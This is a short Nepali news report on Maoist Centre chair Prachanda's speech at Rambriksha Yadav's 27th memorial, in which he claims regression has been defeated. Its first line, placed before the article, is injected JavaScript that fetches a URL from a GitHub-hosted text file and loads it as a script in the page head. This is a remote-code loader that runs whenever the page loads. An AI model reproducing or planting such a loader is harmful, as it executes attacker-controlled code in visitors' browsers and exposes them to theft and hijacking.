;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाण्डौ | नेपाल कम्युनिष्ट पार्टी (माओवादी केन्द्र) का अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ले बुधबार (आज) रामबृक्ष यादवको २७औं स्मृति दिवसलाई सम्बोधन गर्दै प्रतिगमनकारी प्रवृतिलाई प्ररास्त गर्न विद्रोह गर्नुपरेको बताएका छन् |
कम्युनिष्ट आन्दोलनभित्र देखा परेको तानाशाही, निरंकुश, व्यक्तिवादी र आत्मसर्पणवादी प्रवृतिप्रति विद्रोह गर्नुपरेको अध्यक्ष प्रचण्डको बताए । कम्युनिष्टमा देखापरेको व्यक्तिवादी प्रवृतिलाई रोक्न आफूहरुले निर्मम रुपमा विद्रोह गरेको र सफल भएको उनले बताए । ‘प्रतिगमन अहिलेलाई परास्त भएको छ,’ अध्यक्ष प्रचण्डले भने, ‘र, संविधान तथा राष्ट्रियतालाई रक्षा गर्ने प्रवृत्तिको विजय भएको छ । यो सुखद् हो ।’
यस्तै अध्यक्ष प्रचण्डले समाजवादको बाटोमा अघि बढ्न लामो आन्दोलन आवश्यक पर्ने व्यक्त गरे । पार्टीलाई सशक्त बनाउनका लागि तल्लो तहदेखि नै साथ दिनुपर्ने धारणा व्यक्त गरेका प्रचण्डले थपे, ‘तर, प्रतिगमन परास्त गरियो भन्दैमा ढुक्कै बस्ने स्थिति छैन ।’
अध्यक्ष प्रचण्डले मुलुकको परिवर्तनका लागि शहीद, घाइते, अपाङ्हरुलाई कहिल्यै नबिर्सने स्पष्ट पारे । उनले कम्युनिष्टलाई एकताबद्ध पार्न सदैव लागिपर्ने बताए ।
फेसबुक प्रतिक्रियाहरु